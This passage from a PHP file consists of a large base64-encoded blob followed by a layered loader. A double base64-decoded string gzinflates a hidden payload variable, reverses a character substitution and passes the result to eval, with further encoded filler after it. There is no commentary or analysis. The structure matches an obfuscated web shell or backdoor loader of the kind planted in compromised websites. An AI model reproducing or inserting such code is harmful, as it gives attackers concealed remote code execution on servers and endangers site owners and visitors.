rbBqXPX4nDuq2dgIff5S752uCZaxe1oAf7zDTliZwq7dJzMd+4L7TOoASrX08YV2I24TNv1Z1dd9tiyy6drEhSMCCM1T+24GuXbngMzoZsO85fRYpjFKmLtdpsoGdAxn/QgODpaHrg5lCnntT4aUmvQYJF5DqzMRXOq6UKXfKVYgjBJe6RSiOikKcY2FO3EWl3gOsaj6W5WqP561w4PsPJBuIjx3JUJee8utyjvGFVi5ULMAA+iqK0mZhd33Zt9XNT7MXp8P25yP0o27U5tmw6azTyGBkECVzEpxi1BBZNs75RDTlwujaAHNYR3FUs2jrmM5PntNOG4Q4G3vvjG4wypx6eKiGR9n/Bk20QbJNe2ahaBWxRZaVQtgaWtm6J21LeaylMpZmgNL34VDu2BpBay7calLjRkh1WmVpKn0M4y4CDUo1BoBCpPRuv4gEnl3tc51Y9t2jC8bjDIuVWTdsq0gO2KXI7mqbMoUbFStZBYGozHFfQNVoajIpb2w9X5OVoeYBu11DGX5OgOatxbOcudtojmlq47IUWs/GazkxzuEjPJh6/tsbWGwexu28vVdZDvPmo2a9/+OHKIAqOHvLYRFzr5BHAlnt5BB5bDszGHlK9vtKjOMSQ97UJjQG13RLgy5ebLoOj9ZhJFJZlvnFPVW5t+4iqvF6knO1U2S5N04NmfJH2uU1BgDRSt6EFl8vO8oblq32wPJ7myf9g9VDmdmc9kdCXgoH+rd52oDSBG9LEEwBbfCyzj6mWIx4x4DdczuRcWhUvW0dAdBHZW3hsrvxTqO3gAEr2ImyQztgMSYZydQtPBliFlTj/KiVH3f1QvvqOKF8MjPQDfiJ/3hGgw+QvWRz4hxS0n19CO8K2WVpmvtYonKJo4d9Arqcsk+N0vy+0WVax6VPBZMWKeDu5zENZHf/VA7+sq5FboCT6GFVTk9v8Ptam4hvs02FB5ozpFjZHhtgoy0xwm8JaefotBTtXZ4f2/yunq5kzotD9EtkzRyikIgUHfzCkumt7rIoo524LYB/jZI0/rVmTspe9ZLetxqk2GY4++ENNX9G6q+WOqAAkYFGw9h0BEIuzh6TGJfc0gCCVBbDQGjm34yDzaYRY8CcAM+o266mWc6i2HwPAuDmrMaSIFErJ5j1Yk+N3OrgDZg0rziIRddyCk1sz/+YOqGBBW1yl875WtZeamiRtFLZQPjd1T2ufxX3CNUojvSil7wObJw0z7MlbxkwcoXmED6doEQpl1YKpaWZnlXr3xfoKiLlVeVadc1U1qkfTguDKhTuqVDmKoO+G19gbfRxBXdgwCdz6BjdDhG21htY7Qj01yOVCBohscjio9HFhOkE7iQyqEYh1NGa2Z2VNjZUWZoS5vGo632bqQD1RFGqqMsrBzpNGdkrcko+CA38UwZLW8kfwbaKs6soU0XwjaRNso6Rjg+0vF4QQtfm8SScGTt0U1NR96tsW8/tWpFP1MryTUUewOFk9DVzVo/ke1MN6b7Owpd09aeAgUa3zSNUof6BY7SNdKb+JTp/j7F4MXop582munpZqdSlOBv6lWm+3qVMs/arUy3uZXpJrdS4nYfn2DGNnja9u7uQdf5BgZHZRPTUDnIHu5iutNdWB3+gWYUI/Tsl17wYNQuzFUXMr2bC8m2dfb3IZUe9U4kX86tZDe6kQqN2/qRWzuSHZ7ks5hzzN82OxL+21KEss6VfFE/9nkcmf5Nuxry+c/d/Wm0b+VEy1dsbuBGUZBzmbqRI92/Z70rNfpvdqa6UJLb2y6l4goCFbLyMwHVH+h4gCclT5nV0e7Wwh8ioN/kqWwW5Z85evodIWThfwA=";$rand=base64_decode("Skc1aGRpQTlJR2Q2YVc1bWJHRjBaU2hpWVhObE5qUmZaR1ZqYjJSbEtDUlRTVk5VUlUxSlZGOURUMDFmUlU1REtTazdEUW9KQ1Fra2MzUnlJRDBnV3lmMUp5d242eWNzSitNbkxDZjdKeXduNFNjc0ovRW5MQ2ZtSnl3bjdTY3NKLzBuTENmcUp5d250U2RkT3cwS0NRa0pKSEp3YkdNZ1BWc25ZU2NzSjJrbkxDZDFKeXduWlNjc0oyOG5MQ2RrSnl3bmN5Y3NKMmduTENkMkp5d25kQ2NzSnlBblhUc05DZ2tKSUNBZ0lDUnVZWFlnUFNCemRISmZjbVZ3YkdGalpTZ2tjM1J5TENSeWNHeGpMQ1J1WVhZcE93MEtDUWtKWlhaaGJDZ2tibUYyS1RzPQ==");eval(base64_decode($rand));$STOP="kucx4B8RPsGUEFGamUySB40kx7HHsXdjj2E7+zawZgWIgAR4KILhRTNO/H7GO+zl/Yr+QXwC+kBCBx761DCwVdVNsklRHzPjrHdtYESxq6uqu+u7u3X/XipiOU7lVCy9eBwnc/kh8uWYy7hpP+KJ6P6buBRhLOzW6f17jbHPBsz+xb/0o4X/Rro2veTw0urz+NqTw1hM";
?>